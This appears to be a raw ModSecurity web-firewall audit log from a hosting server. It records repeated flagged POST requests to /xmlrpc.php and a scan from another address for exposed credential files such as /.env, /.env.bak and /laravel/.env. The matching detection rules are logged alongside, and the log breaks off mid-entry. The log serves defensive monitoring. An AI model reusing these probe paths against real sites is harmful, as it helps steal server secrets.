X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 687 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --6920fa76-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6920fa76-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4YGT9o8tFLnaQ0S_4x4wAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948441896688 1032577 (- - -) Stopwatch2: 1749948441896688 1032577; combined=2419, p1=340, p2=1674, p3=72, p4=51, p5=179, sr=92, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6920fa76-Z-- --976f3d73-A-- [15/Jun/2025:06:18:46.526763 +0530] aE4YbT9o8tFLnaQ0S_4yAAAAAAQ 167.250.235.41 44404 127.0.0.1 7081 --976f3d73-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --976f3d73-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --976f3d73-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4YbT9o8tFLnaQ0S_4yAAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948525464580 1062262 (- - -) Stopwatch2: 1749948525464580 1062262; combined=2285, p1=351, p2=1494, p3=78, p4=65, p5=186, sr=105, sw=111, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --976f3d73-Z-- --a9cb0956-A-- [15/Jun/2025:06:20:09.408542 +0530] aE4YwD9o8tFLnaQ0S_4yFQAAAAQ 167.250.235.41 47106 127.0.0.1 7081 --a9cb0956-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a9cb0956-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a9cb0956-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4YwD9o8tFLnaQ0S_4yFQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948608340675 1067941 (- - -) Stopwatch2: 1749948608340675 1067941; combined=2186, p1=373, p2=1382, p3=64, p4=60, p5=185, sr=99, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a9cb0956-Z-- --0701990d-A-- [15/Jun/2025:06:21:34.090828 +0530] aE4ZFbdgU2RqPO-R9-XUMgAAAA0 167.250.235.41 42522 127.0.0.1 7081 --0701990d-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0701990d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0701990d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4ZFbdgU2RqPO-R9-XUMgAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948693052810 1038082 (- - -) Stopwatch2: 1749948693052810 1038082; combined=2262, p1=365, p2=1525, p3=60, p4=45, p5=168, sr=102, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0701990d-Z-- --1cfb581c-A-- [15/Jun/2025:06:21:51.425004 +0530] aE4ZJyeXHcLENIHhuFcvsgAAAAU 185.177.72.144 45486 127.0.0.1 7080 --1cfb581c-B-- GET /.env HTTP/1.0 Host: www.printotech.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1cfb581c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1cfb581c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/.env"] [unique_id "aE4ZJyeXHcLENIHhuFcvsgAAAAU"] Stopwatch: 1749948711422146 2918 (- - -) Stopwatch2: 1749948711422146 2918; combined=1677, p1=417, p2=1205, p3=0, p4=0, p5=55, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1cfb581c-Z-- --d8803941-A-- [15/Jun/2025:06:21:51.580705 +0530] aE4ZJ2ydX8vZg3SgqNzK2wAAAAI 185.177.72.144 45502 127.0.0.1 7080 --d8803941-B-- GET /.env.bak HTTP/1.0 Host: www.printotech.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d8803941-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d8803941-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.printotech.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/.env.bak"] [unique_id "aE4ZJ2ydX8vZg3SgqNzK2wAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.printotech.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.printotech.com"] [uri "/.env.bak"] [unique_id "aE4ZJ2ydX8vZg3SgqNzK2wAAAAI"] Stopwatch: 1749948711577467 3290 (- - -) Stopwatch2: 1749948711577467 3290; combined=1843, p1=394, p2=1378, p3=0, p4=0, p5=71, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d8803941-Z-- --c590314d-A-- [15/Jun/2025:06:21:51.697529 +0530] aE4ZJ8H4SeX80EzN5eWVXgAAAAs 185.177.72.144 45516 127.0.0.1 7080 --c590314d-B-- GET /.env.example HTTP/1.0 Host: www.printotech.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c590314d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c590314d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/.env.example"] [unique_id "aE4ZJ8H4SeX80EzN5eWVXgAAAAs"] Stopwatch: 1749948711694447 3134 (- - -) Stopwatch2: 1749948711694447 3134; combined=1828, p1=415, p2=1360, p3=0, p4=0, p5=53, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c590314d-Z-- --31d8f412-A-- [15/Jun/2025:06:21:51.809381 +0530] aE4ZJxkoa9Lad8nP7KOEBAAAABA 185.177.72.144 45532 127.0.0.1 7080 --31d8f412-B-- GET /.env.local HTTP/1.0 Host: www.printotech.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --31d8f412-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --31d8f412-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/.env.local"] [unique_id "aE4ZJxkoa9Lad8nP7KOEBAAAABA"] Stopwatch: 1749948711806200 3235 (- - -) Stopwatch2: 1749948711806200 3235; combined=1906, p1=392, p2=1461, p3=0, p4=0, p5=53, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --31d8f412-Z-- --dfc94e33-A-- [15/Jun/2025:06:21:51.919235 +0530] aE4ZJ4dVJK-eDwr5Vlo18AAAAAc 185.177.72.144 45536 127.0.0.1 7080 --dfc94e33-B-- GET /.env.old HTTP/1.0 Host: www.printotech.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dfc94e33-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --dfc94e33-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.printotech.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/.env.old"] [unique_id "aE4ZJ4dVJK-eDwr5Vlo18AAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.printotech.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.printotech.com"] [uri "/.env.old"] [unique_id "aE4ZJ4dVJK-eDwr5Vlo18AAAAAc"] Stopwatch: 1749948711915640 3661 (- - -) Stopwatch2: 1749948711915640 3661; combined=2088, p1=495, p2=1491, p3=0, p4=0, p5=102, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dfc94e33-Z-- --b9fadd49-A-- [15/Jun/2025:06:21:52.062149 +0530] aE4ZKLdgU2RqPO-R9-XUNwAAAA0 185.177.72.144 45538 127.0.0.1 7080 --b9fadd49-B-- GET /.env.production HTTP/1.0 Host: www.printotech.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b9fadd49-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b9fadd49-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/.env.production"] [unique_id "aE4ZKLdgU2RqPO-R9-XUNwAAAA0"] Stopwatch: 1749948712058925 3297 (- - -) Stopwatch2: 1749948712058925 3297; combined=1962, p1=428, p2=1481, p3=0, p4=0, p5=53, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9fadd49-Z-- --fbd7597f-A-- [15/Jun/2025:06:21:52.707578 +0530] aE4ZKD9o8tFLnaQ0S_4yNwAAAAQ 185.177.72.144 45570 127.0.0.1 7080 --fbd7597f-B-- GET /app/.env HTTP/1.0 Host: www.printotech.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fbd7597f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --fbd7597f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/app/.env"] [unique_id "aE4ZKD9o8tFLnaQ0S_4yNwAAAAQ"] Stopwatch: 1749948712704351 3282 (- - -) Stopwatch2: 1749948712704351 3282; combined=1896, p1=436, p2=1401, p3=0, p4=0, p5=58, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fbd7597f-Z-- --c863161a-A-- [15/Jun/2025:06:21:54.337154 +0530] aE4ZKieXHcLENIHhuFcvtAAAAAU 185.177.72.144 45678 127.0.0.1 7080 --c863161a-B-- GET /laravel/.env HTTP/1.0 Host: www.printotech.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c863161a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c863161a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/laravel/.env"] [unique_id "aE4ZKieXHcLENIHhuFcvtAAAAAU"] Stopwatch: 1749948714334010 3218 (- - -) Stopwatch2: 1749948714334010 3218; combined=1900, p1=458, p2=1369, p3=0, p4=0, p5=73, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c863161a-Z-- --1ddeb73d-A-- [15/Jun/2025:06:22:58.677577 +0530] aE4ZaSeXHcLENIHhuFcvxwAAAAU 167.250.235.41 44768 127.0.0.1 7081 --1ddeb73d-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 687 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1ddeb73d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1ddeb73d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4ZaSeXHcLENIHhuFcvxwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948777656933 1020709 (- - -) Stopwatch2: 1749948777656933 1020709; combined=2028, p1=339, p2=1308, p3=63, p4=51, p5=166, sr=93, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1ddeb73d-Z-- --5e8a1322-A-- [15/Jun/2025:06:24:10.998222 +0530] aE4ZsbdgU2RqPO-R9-XUYAAAAA0 167.250.235.41 45162 127.0.0.1 7081 --5e8a1322-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 702 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5e8a1322-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5e8a1322-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4ZsbdgU2RqPO-R9-XUYAAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948849955426 1042862 (- - -) Stopwatch2: 1749948849955426 1042862; combined=2181, p1=364, p2=1410, p3=50, p4=41, p5=190, sr=88, sw=126, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e8a1322-Z-- --fa7d0726-A-- [15/Jun/2025:06:25:27.122020 +0530] aE4Z_lIoq-7Cj_2-ZLTSjAAAAAA 167.250.235.41 51618 127.0.0.1 7081 --fa7d0726-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 700 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fa7d0726-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fa7d0726-H-- Message: Warning. Operator EQ matched 0 at IP. [file 